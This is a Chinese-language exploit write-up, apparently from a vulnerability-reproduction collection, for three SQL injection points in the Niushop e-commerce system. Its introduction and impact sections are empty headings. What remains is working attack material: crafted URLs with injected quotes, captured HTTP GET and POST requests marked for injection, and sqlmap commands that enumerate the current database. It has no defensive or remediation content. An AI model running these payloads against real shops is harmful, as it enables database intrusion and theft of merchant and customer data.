Niushop sql注入
一、漏洞简介
二、漏洞影响
三、复现过程
sql注入(一)
order参数:
http://0-sec.org/index.php/wap/goods/getGoodsListByConditions?category_id=1&brand_id=2&min_price=3&max_price=4&page=5&page_size=6&order=7%27&attr_array[][2]=8&spec_array[]=9
attr_array参数:
http://0-sec.org/index.php/wap/goods/getGoodsListByConditions?category_id=1&brand_id=2&min_price=3&max_price=4&page=5&page_size=6&order=7&attr_array[][2]=8%27&spec_array[]=9
直接上sqlmap
sqlmap -u "http://0-sec.org/index.php/wap/goods/getGoodsListByConditions?category_id=1&brand_id=2&min_price=3&max_price=4&page=5&page_size=6&order=7&attr_array[][2]=8*&spec_array[]=9" --random-agent --batch --dbms "mysql"
sqlmap -u "http://0-sec.org/index.php/wap/goods/getGoodsListByConditions?category_id=1&brand_id=2&min_price=3&max_price=4&page=5&page_size=6&order=7&attr_array[][2]=8*&spec_array[]=9" --random-agent --batch --dbms "mysql" --current-db
sql注入(二)
GET /index.php?s=/wap/Goods/promotionZone&group_id=*&page=1 HTTP/1.1
Host: 0-sec.org
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://172.16.209.129:8085/index.php/wap/goods/promotionZone
X-Requested-With: XMLHttpRequest
Cookie: PHPSESSID=uolpfnofnhcmdnamo55d883bk4; admin_type=1; workspaceParamSupplier=index%7CGoods; CNZZDATA009=30037667-1536735
Connection: close
将数据包保存为niushop.txt
sqlmap -r niushop.txt --random-agent --batch --dbms "mysql"
sql注入(三)
POST /index.php?s=/wap/Goods/goodsSearchList HTTP/1.1
Host: 0-sec.org
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://172.16.209.129:8086/index.php/wap/goods/goodsSearchList
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 66
Cookie: PHPSESSID=uolpfnofnhcmdnamo55d883bk4; admin_type=1; workspaceParamSupplier=index%7CGoods; CNZZDATA009=30037667-1536735
Connection: close
Cache-Control: max-age=0
sear_name=&sear_type=1&order=*&sort=asc&controlType=&shop_id=0&page=1
数据包保存为niushop.txt
sqlmap -r niushop.txt --random-agent --batch --dbms "mysql"